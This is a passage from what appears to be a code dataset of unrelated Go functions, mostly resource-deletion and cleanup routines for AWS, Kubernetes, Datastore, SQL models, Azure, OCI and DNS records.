tool.IsCanaryTargetGroupArn(*tg, region.Region) {\n\t\t\t\tc.Logger.Debugf(\"Try to delete target group: %s\", *tg)\n\t\t\t\tif err := client.ELBV2Service.DeleteTargetGroup(tg); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tc.Logger.Debugf(\"Deleted target group: %s\", *tg)\n\t\t\t}\n\t\t}\n\t}\n\n\tc.Logger.Debugf(\"Start to delete load balancer and security group for canary\")\n\tif completeCanary {\n\t\tif err := c.DeleteLoadBalancer(region); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := c.LoadBalancerDeletionChecking(region); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := c.DeleteEC2IngressRules(region); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := c.DeleteEC2SecurityGroup(region); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := c.DeleteLBSecurityGroup(region); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}", "func (client *Client) DeleteSurveyResources(request *DeleteSurveyResourcesRequest) (response *DeleteSurveyResourcesResponse, err error) {\n\tresponse = CreateDeleteSurveyResourcesResponse()\n\terr = client.DoAction(request, response)\n\treturn\n}", "func DestroyResourceConfigs(\n\tctx context.Context,\n\tc client.Client,\n\tnamespace string,\n\tclusterType ClusterType,\n\tmanagedResourceName string,\n\tresourceConfigs ...ResourceConfigs,\n) error {\n\tif clusterType == ClusterTypeSeed {\n\t\treturn managedresources.DeleteForSeed(ctx, c, namespace, managedResourceName)\n\t}\n\n\tif err := managedresources.DeleteForShoot(ctx, c, namespace, managedResourceName); err != nil {\n\t\treturn err\n\t}\n\n\treturn kubernetesutils.DeleteObjects(ctx, c, AllRuntimeObjects(resourceConfigs...)...)\n}", "func Cleanup(ctx context.Context) error {\n\n\tcdsCli, err := clds.NewClient(ctx, os.Getenv(\"DATASTORE_PROJECT_ID\"))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tq := clds.NewQuery(\"__namespace__\").KeysOnly()\n\tnamespaceKeys, err := cdsCli.GetAll(ctx, q, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvar eg errgroup.Group\n\tfor _, nsKey := range namespaceKeys {\n\t\tnsKey := nsKey\n\t\teg.Go(func() error {\n\t\t\tq := clds.NewQuery(\"__kind__\").Namespace(nsKey.Name).KeysOnly()\n\t\t\tkindKeys, err := cdsCli.GetAll(ctx, q, nil)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tfor _, kindKey := range kindKeys {\n\t\t\t\tq := clds.NewQuery(kindKey.Name).Namespace(kindKey.Namespace).KeysOnly()\n\t\t\t\tkeys, err := cdsCli.GetAll(ctx, q, nil)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tconst limit = 500\n\t\t\t\tfor {\n\t\t\t\t\tif len(keys) <= limit {\n\t\t\t\t\t\terr = cdsCli.DeleteMulti(ctx, keys)\n\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\treturn err\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\n\t\t\t\t\terr = cdsCli.DeleteMulti(ctx, keys[0:limit])\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\tkeys = keys[limit:]\n\t\t\t\t}\n\t\t\t}\n\n\t\t\treturn nil\n\t\t})\n\t}\n\n\terr = eg.Wait()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (o RecordMeasureSlice) DeleteAll(exec boil.Executor) error {\n\tif o == nil {\n\t\treturn errors.New(\"public: no RecordMeasure slice provided for delete all\")\n\t}\n\n\tif len(o) == 0 {\n\t\treturn nil\n\t}\n\n\tif len(recordMeasureBeforeDeleteHooks) != 0 {\n\t\tfor _, obj := range o {\n\t\t\tif err := obj.doBeforeDeleteHooks(exec); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\tvar args []interface{}\n\tfor _, obj := range o {\n\t\tpkeyArgs := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(obj)), recordMeasurePrimaryKeyMapping)\n\t\targs = append(args, pkeyArgs...)\n\t}\n\n\tquery := fmt.Sprintf(\n\t\t\"DELETE FROM \\\"record_measures\\\" WHERE (%s) IN (%s)\",\n\t\tstrings.Join(strmangle.IdentQuoteSlice(dialect.LQ, dialect.RQ, recordMeasurePrimaryKeyColumns), \",\"),\n\t\tstrmangle.Placeholders(dialect.IndexPlaceholders, len(o)*len(recordMeasurePrimaryKeyColumns), 1, len(recordMeasurePrimaryKeyColumns)),\n\t)\n\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, query)\n\t\tfmt.Fprintln(boil.DebugWriter, args)\n\t}\n\n\t_, err := exec.Exec(query, args...)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"public: unable to delete all from recordMeasure slice\")\n\t}\n\n\tif len(recordMeasureAfterDeleteHooks) != 0 {\n\t\tfor _, obj := range o {\n\t\t\tif err := obj.doAfterDeleteHooks(exec); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func DeleteStatefulSet(client kubernetes.Interface, namespace string, statefulsetName string) error {\n\tlogrus.Infof(\"Deleting StatefulSet %s\", statefulsetName)\n\tstatefulsetError := client.AppsV1beta1().StatefulSets(namespace).Delete(statefulsetName, &metav1.DeleteOptions{})\n\ttime.Sleep(10 * time.Second)\n\treturn statefulsetError\n}", "func (t *IPDCChaincode) invoke_delete_all_records(stub shim.ChaincodeStubInterface, args []string, map_specification map[string]interface{}) pb.Response {\r\n\r\n\tfmt.Println(\"***********Entering invoke_delete_all_records***********\")\r\n\r\n\tvar arguments []string\r\n\r\n\tvar ok bool\r\n\r\n\tvar additional_json interface{}\r\n\r\n\tvar record_specification = make(map[string]interface{})\r\n\r\n\tadditional_json, ok = map_specification[\"additional_json\"]\r\n\r\n\tif ok {\r\n\r\n\t\tadditional_json_data, ok1 := additional_json.(map[string]interface{})\r\n\r\n\t\tif ok1 {\r\n\r\n\t\t\tfor spec, _ := range additional_json_data {\r\n\r\n\t\t\t\trecord_specification[spec] = additional_json_data[spec]\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\tfmt.Println(\"Error: Invalid additional JSON fields in specification\")\r\n\r\n\t\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\t\treturn shim.Error(\"Error: Invalid additional JSON fields in specification\")\r\n\t\t}\r\n\t}\r\n\r\n\tvar keys_map interface{}\r\n\r\n\tvar specs map[string]interface{}\r\n\r\n\tkeys_map, error_keys_map := t.get_keys_map(stub, record_specification)\r\n\r\n\tif error_keys_map != nil {\r\n\r\n\t\tfmt.Println(error_keys_map.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(error_keys_map.Error())\r\n\t}\r\n\r\n\tspecs, ok = keys_map.(map[string]interface{})\r\n\r\n\tif !ok {\r\n\r\n\t\tfmt.Println(\"Error: Invalid keys_map specification.\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(\"Error: Invalid keys_map specification.\")\r\n\t}\r\n\r\n\tvar composite_key = make(map[string]interface{})\r\n\r\n\t//for spec, _ := range record_specification {\r\n\t//\r\n\t//\tcomposite_key[spec] = specs[spec]\r\n\t//}\r\n\r\n\tcomposite_key[\"stagingdb-update-status\"], ok = specs[\"stagingdb-update-status\"]\r\n\r\n\tif !ok {\r\n\r\n\t\tfmt.Println(\"Error: Composite key specification missing for deletion.\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(\"Error: Composite key specification missing for deletion.\")\r\n\t}\r\n\r\n\tcompositekeyJsonString, err_marshal := json.Marshal(composite_key)\r\n\r\n\tif err_marshal != nil {\r\n\r\n\t\tfmt.Println(\"Error in marshaling composite key\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(\"Error in marshaling composite key\")\r\n\t}\r\n\r\n\trecord_specification[\"stagingdb-update-status\"] = \"True\"\r\n\r\n\tvar concatenated_record_json []byte\r\n\r\n\tconcatenated_record_json, err_marshal = json.Marshal(record_specification)\r\n\r\n\tif err_marshal != nil {\r\n\r\n\t\tfmt.Println(\"Error: Unable to Marshal Concatenated Record to JSON\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(\"Error: Unable to Marshal Concatenated Record to JSON\")\r\n\t}\r\n\r\n\targuments = append(arguments, string(concatenated_record_json))\r\n\r\n\targuments = append(arguments, string(compositekeyJsonString))\r\n\r\n\terr_delete, processed_records, records_remaining := t.delete_by_composite_key(stub, arguments, specs, PROCESSING_LIMIT)\r\n\r\n\tif err_delete != nil {\r\n\r\n\t\tfmt.Println(err_delete.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(err_delete.Error())\r\n\t}\r\n\r\n\tif records_remaining {\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Success([]byte(\"1\"))\r\n\t}\r\n\r\n\trecord_specification[\"stagingdb-update-status\"] = \"False\"\r\n\r\n\tconcatenated_record_json, err_marshal = json.Marshal(record_specification)\r\n\r\n\tif err_marshal != nil {\r\n\r\n\t\tfmt.Println(\"Error: Unable to Marshal Concatenated Record to JSON\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(\"Error: Unable to Marshal Concatenated Record to JSON\")\r\n\t}\r\n\r\n\targuments = make([]string, 0)\r\n\r\n\targuments = append(arguments, string(concatenated_record_json))\r\n\r\n\targuments = append(arguments, string(compositekeyJsonString))\r\n\r\n\tPROCESSING_LIMIT_TEMP := PROCESSING_LIMIT - processed_records\r\n\r\n\terr_delete, _, records_remaining = t.delete_by_composite_key(stub, arguments, specs, PROCESSING_LIMIT_TEMP)\r\n\r\n\tif err_delete != nil {\r\n\r\n\t\tfmt.Println(err_delete.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Error(err_delete.Error())\r\n\t}\r\n\r\n\tif !records_remaining {\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Success([]byte(\"0\"))\r\n\r\n\t} else {\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_all_records***********\")\r\n\r\n\t\treturn shim.Success([]byte(\"1\"))\r\n\t}\r\n\r\n}", "func (d *DNSController) ensureDNSRrsets(dnsZone dnsprovider.Zone, dnsName string, endpoints []string, uplevelCname string) error {\n\trrsets, supported := dnsZone.ResourceRecordSets()\n\tif !supported {\n\t\treturn fmt.Errorf(\"Failed to ensure DNS records for %s. DNS provider does not support the ResourceRecordSets interface\", dnsName)\n\t}\n\trrsetList, err := rrsets.Get(dnsName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(rrsetList) == 0 {\n\t\tglog.V(4).Infof(\"No recordsets found for DNS name %q. Need to add either A records (if we have healthy endpoints), or a CNAME record to %q\", dnsName, uplevelCname)\n\t\tif len(endpoints) < 1 {\n\t\t\tglog.V(4).Infof(\"There are no healthy endpoint addresses at level %q, so CNAME to %q, if provided\", dnsName, uplevelCname)\n\t\t\tif uplevelCname != \"\" {\n\t\t\t\tglog.V(4).Infof(\"Creating CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully created CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t} else {\n\t\t\t\tglog.V(4).Infof(\"We want no record for %q, and we have no record, so we're all good.\", dnsName)\n\t\t\t}\n\t\t} else {\n\t\t\t// We have valid endpoint addresses, so just add them as A records.\n\t\t\t// But first resolve DNS names, as some cloud providers (like AWS) expose\n\t\t\t// load balancers behind DNS names, not IP addresses.\n\t\t\tglog.V(4).Infof(\"We have valid endpoint addresses %v at level %q, so add them as A records, after resolving DNS names\", endpoints, dnsName)\n\t\t\t// Resolve DNS through network\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil {\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tglog.V(4).Infof(\"Successfully added recordset %v\", newRrset)\n\t\t}\n\t} else {\n\t\t// the rrsets already exists, so make it right.\n\t\tglog.V(4).Infof(\"Recordset %v already exists. Ensuring that it is correct.\", rrsetList)\n\t\tif len(endpoints) < 1 {\n\t\t\t// Need an appropriate CNAME record. Check that we have it.\n\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\tglog.V(4).Infof(\"No healthy endpoints for %d. Have recordsets %v. Need recordset %v\", dnsName, rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\t// The existing rrset is equivalent to the required one - our work is done here\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", rrsetList, newRrset)\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one (or just remove it if we have no healthy endpoints).\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v not equivalent to needed recordset %v removing existing and adding needed.\", rrsetList, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tif uplevelCname != \"\" {\n\t\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully replaced needed recordset %v -> %v\", found, newRrset)\n\t\t\t\t} else {\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully removed existing recordset %v\", found)\n\t\t\t\t\tglog.V(4).Infof(\"Uplevel CNAME is empty string. Not adding recordset %v\", newRrset)\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\t// We have an rrset in DNS, possibly with some missing addresses and some unwanted addresses.\n\t\t\t// And we have healthy endpoints. Just replace what'd there with the healthy endpoints, if it'd not already correct.\n\t\t\tglog.V(4).Infof(\"%d: Healthy endpoints %v exist. Recordset %v exists. Reconciling.\", dnsName, endpoints, rrsetList)\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil { // Some invalid addresses or otherwise unresolvable DNS names.\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Have recordset %v. Need recordset %v\", rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", found, newRrset)\n\t\t\t\t// TODO: We could be more thorough about checking for equivalence to avoid unnecessary updates, but in the\n\t\t\t\t// worst case we'll just replace what'd there with an equivalent, if not exactly identical record set.\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is not equivalent to needed recordset %v, removing existing and adding needed.\", found, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\tif err = changeSet.Apply(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully replaced recordset %v -> %v\", found, newRrset)\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func NewRecordSetsClient(con *armcore.Connection, subscriptionID string) *RecordSetsClient {\n\treturn &RecordSetsClient{con: con, subscriptionID: subscriptionID}\n}", "func (r *ClusterReconciler) deleteExternalResources(cluster clusterv1.Cluster, ctx context.Context) error {\n\t//\n\t// delete any external resources associated with the cluster\n\t//\n\t// Ensure that delete implementation is idempotent and safe to invoke\n\t// multiple types for same object.\n\n\t// get target memberCluster client\n\tmClient := clients.Interface().Kubernetes(cluster.Name)\n\n\t// delete internal cluster and release goroutine inside\n\terr := multicluster.Interface().Del(cluster.Name)\n\tif err != nil {\n\t\tclog.Error(\"delete internal cluster %v failed\", err)\n\t\treturn err\n\t}\n\tclog.Debug(\"delete internal cluster %v success\", cluster.Name)\n\n\t// delete kubecube-system of cluster\n\tns := corev1.Namespace{ObjectMeta: metav1.ObjectMeta{Name: constants.CubeNamespace}}\n\terr = mClient.Direct().Delete(ctx, &ns)\n\tif err != nil {\n\t\tif errors.IsNotFound(err) {\n\t\t\tclog.Warn(\"namespace %v of cluster %v not failed, delete skip\", constants.CubeNamespace, cluster.Name)\n\t\t}\n\t\tclog.Error(\"delete namespace %v of cluster %v failed: %v\", constants.CubeNamespace, cluster.Name, err)\n\t\treturn err\n\t}\n\tclog.Debug(\"delete kubecube-system of cluster %v success\", cluster.Name)\n\n\treturn nil\n}", "func (client *AvailabilitySetsClient) Delete(ctx context.Context, resourceGroupName string, availabilitySetName string, options *AvailabilitySetsDeleteOptions) (AvailabilitySetsDeleteResponse, error) {\n\treq, err := client.deleteCreateRequest(ctx, resourceGroupName, availabilitySetName, options)\n\tif err != nil {\n\t\treturn AvailabilitySetsDeleteResponse{}, err\n\t}\n\tresp, err := client.pl.Do(req)\n\tif err != nil {\n\t\treturn AvailabilitySetsDeleteResponse{}, err\n\t}\n\tif !runtime.HasStatusCode(resp, http.StatusOK, http.StatusNoContent) {\n\t\treturn AvailabilitySetsDeleteResponse{}, client.deleteHandleError(resp)\n\t}\n\treturn AvailabilitySetsDeleteResponse{RawResponse: resp}, nil\n}", "func (resourceSet *ResourceSet) UnmarshalJSON(data []byte) error {\n\tvar sset set.StringSet\n\tif err := json.Unmarshal(data, &sset); err != nil {\n\t\treturn err\n\t}\n\n\t*resourceSet = make(ResourceSet)\n\tfor _, s := range sset.ToSlice() {\n\t\tresourceSet.Add(s)\n\t}\n\n\treturn nil\n}", "func (c *quarksStatefulSets) DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error {\n\tvar timeout time.Duration\n\tif listOpts.TimeoutSeconds != nil {\n\t\ttimeout = time.Duration(*listOpts.TimeoutSeconds) * time.Second\n\t}\n\treturn c.client.Delete().\n\t\tNamespace(c.ns).\n\t\tResource(\"quarksstatefulsets\").\n\t\tVersionedParams(&listOpts, scheme.ParameterCodec).\n\t\tTimeout(timeout).\n\t\tBody(&opts).\n\t\tDo(ctx).\n\t\tError()\n}", "func (r *FooReconciler) cleanupOwnedResources(ctx context.Context, log logr.Logger, foo *batchv1.Foo) error {\n\tlog.Info(\"finding existing Deployments for MyKind resource\")\n\n\t// List all deployment resources owned by this MyKind\n\tvar deployments apps.DeploymentList\n\t//if err := r.List(ctx, &deployments, client.InNamespace(foo.Namespace), client.MatchingField(deploymentOwnerKey, foo.Name)); err != nil {\n\t//\treturn err\n\t//}\n\n\tdeleted := 0\n\tfor _, depl := range deployments.Items {\n\t\tif depl.Name == foo.Spec.Name {\n\t\t\t// If this deployment's name matches the one on the MyKind resource\n\t\t\t// then do not delete it.\n\t\t\tcontinue\n\t\t}\n\n\t\tif err := r.Client.Delete(ctx, &depl); err != nil {\n\t\t\tlog.Error(err, \"failed to delete Deployment resource\")\n\t\t\treturn err\n\t\t}\n\n\t\tr.Recorder.Eventf(foo, core.EventTypeNormal, \"Deleted\", \"Deleted deployment %q\", depl.Name)\n\t\tdeleted++\n\t}\n\n\tlog.Info(\"finished cleaning up old Deployment resources\", \"number_deleted\", deleted)\n\n\treturn nil\n}", "func (o ForeignLegalResourceSlice) DeleteAll(ctx context.Context, exec boil.ContextExecutor) (int64, error) {\n\tif len(o) == 0 {\n\t\treturn 0, nil\n\t}\n\n\tvar args []interface{}\n\tfor _, obj := range o {\n\t\tpkeyArgs := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(obj)), foreignLegalResourcePrimaryKeyMapping)\n\t\targs = append(args, pkeyArgs...)\n\t}\n\n\tsql := \"DELETE FROM \\\"ForeignLegalResources\\\" WHERE \" +\n\t\tstrmangle.WhereClauseRepeated(string(dialect.LQ), string(dialect.RQ), 1, foreignLegalResourcePrimaryKeyColumns, len(o))\n\n\tif boil.IsDebug(ctx) {\n\t\twriter := boil.DebugWriterFrom(ctx)\n\t\tfmt.Fprintln(writer, sql)\n\t\tfmt.Fprintln(writer, args)\n\t}\n\tresult, err := exec.ExecContext(ctx, sql, args...)\n\tif err != nil {\n\t\treturn 0, errors.Wrap(err, \"models: unable to delete all from foreignLegalResource slice\")\n\t}\n\n\trowsAff, err := result.RowsAffected()\n\tif err != nil {\n\t\treturn 0, errors.Wrap(err, \"models: failed to get rows affected by deleteall for ForeignLegalResources\")\n\t}\n\n\treturn rowsAff, nil\n}", "func (cc *ClusterController) cleanupMemberResources(memberName string, r cassandrav1alpha1.RackSpec, c *cassandrav1alpha1.Cluster) error {\n\n\tlogger.Infof(\"%s/%s - Cleaning up resources for member %s\", c.Namespace, c.Name, memberName)\n\t// Delete PVC\n\tif len(r.Storage.VolumeClaimTemplates) > 0 {\n\t\t// PVC naming convention for StatefulSets is <volumeClaimTemplate.Name>-<pod.Name>\n\t\tpvcName := fmt.Sprintf(\"%s-%s\", r.Storage.VolumeClaimTemplates[0].Name, memberName)\n\t\terr := cc.kubeClient.CoreV1().PersistentVolumeClaims(c.Namespace).Delete(pvcName, &metav1.DeleteOptions{})\n\t\tif err != nil && !apierrors.IsNotFound(err) {\n\t\t\treturn fmt.Errorf(\"error deleting pvc %s: %s\", pvcName, err.Error())\n\t\t}\n\t}\n\n\t// Delete Member Service\n\terr := cc.kubeClient.CoreV1().Services(c.Namespace).Delete(memberName, &metav1.DeleteOptions{})\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error deleting member service %s: %s\", memberName, err.Error())\n\t}\n\treturn nil\n}", "func (a *FrinxOpenconfigRoutingPolicyApiService) DeleteFrinxOpenconfigRoutingPolicyRoutingPolicyDefinedSetsTagSets(ctx context.Context, nodeId string) (*http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = strings.ToUpper(\"Delete\")\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\t\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/config/network-topology:network-topology/network-topology:topology/unified/network-topology:node/{node-id}/yang-ext:mount/frinx-openconfig-routing-policy:routing-policy/frinx-openconfig-routing-policy:defined-sets/frinx-openconfig-routing-policy:tag-sets/\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"node-id\"+\"}\", fmt.Sprintf(\"%v\", nodeId), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{\"application/json\", \"application/xml\"}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\", \"application/xml\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarHttpResponse, err\n\t}\n\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericSwaggerError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\t\n\t\treturn localVarHttpResponse, newErr\n\t}\n\n\treturn localVarHttpResponse, nil\n}", "func (l *Manager) ReleaseResources(client string) {\n\t// Looping over the set\n\tfor r := range l.ClientHolder[client] {\n\t\tmsg := l.ReleaseResource(client, r.(string))\n\t\tlog.Println(msg)\n\t}\n}", "func (c *DeviceController) GetRecords(w http.ResponseWriter, r *http.Request) {\n\tvars := mux.Vars(r)\n\tres := r53.GetRecordSets(vars[\"id\"])\n\tc.SendJSON(\n\t\tw,\n\t\tr,\n\t\tres,\n\t\thttp.StatusOK,\n\t)\n}", "func (c *awsSesReceiptRuleSets) Delete(name string, options *meta_v1.DeleteOptions) error {\n\treturn c.client.Delete().\n\t\tNamespace(c.ns).\n\t\tResource(\"awssesreceiptrulesets\").\n\t\tName(name).\n\t\tBody(options).\n\t\tDo().\n\t\tError()\n}", "func (client IdentityClient) BulkDeleteResources(ctx context.Context, request BulkDeleteResourcesRequest) (response BulkDeleteResourcesResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\n\tif !(request.OpcRetryToken != nil && *request.OpcRetryToken != \"\") {\n\t\trequest.OpcRetryToken = common.String(common.RetryToken())\n\t}\n\n\tociResponse, err = common.Retry(ctx, request, client.bulkDeleteResources, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = BulkDeleteResourcesResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = BulkDeleteResourcesResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(BulkDeleteResourcesResponse); ok {\n\t\tcommon.EcContext.UpdateEndOfWindow(time.Duration(240 * time.Second))\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into BulkDeleteResourcesResponse\")\n\t}\n\treturn\n}", "func (o *dnsOp) listRecords(zone dnsprovider.Zone) ([]dnsprovider.ResourceRecordSet, error) {\n\tkey := zone.Name() + \"::\" + zone.ID()\n\n\trrs := o.recordsCache[key]\n\tif rrs == nil {\n\t\trrsProvider, ok := zone.ResourceRecordSets()\n\t\tif !ok {\n\t\t\treturn nil, fmt.Errorf(\"zone does not support resource records %q\", zone.Name())\n\t\t}\n\n\t\tklog.V(2).Infof(\"Querying all dnsprovider records for zone %q\", zone.Name())\n\t\tvar err error\n\t\trrs, err = rrsProvider.List()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"error querying resource records for zone %q: %v\", zone.Name(), err)\n\t\t}\n\n\t\to.recordsCache[key] = rrs\n\t}\n\n\treturn rrs, nil\n}", "func (impl *ServerServerGroup) DeleteCollection() ([]base.ModelInterface, *base.ErrorResponse) {\n\tvar (\n\t\tname = impl.ResourceName()\n\t\trecordCollection = impl.NewEntityCollection()\n\t\tc = impl.GetConnection()\n\t)\n\n\t// We need transaction to ensure the total and the query count is consistent.\n\ttx := c.Begin()\n\tif err := tx.Error; err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"Delete collection in DB failed, start transaction failed.\")\n\t\treturn nil, base.NewErrorResponseTransactionError()\n\t}\n\n\tif err := tx.Where(\"\\\"ServerGroupID\\\" <> ?\", DefaultServerGroupID).Find(recordCollection).Error; err 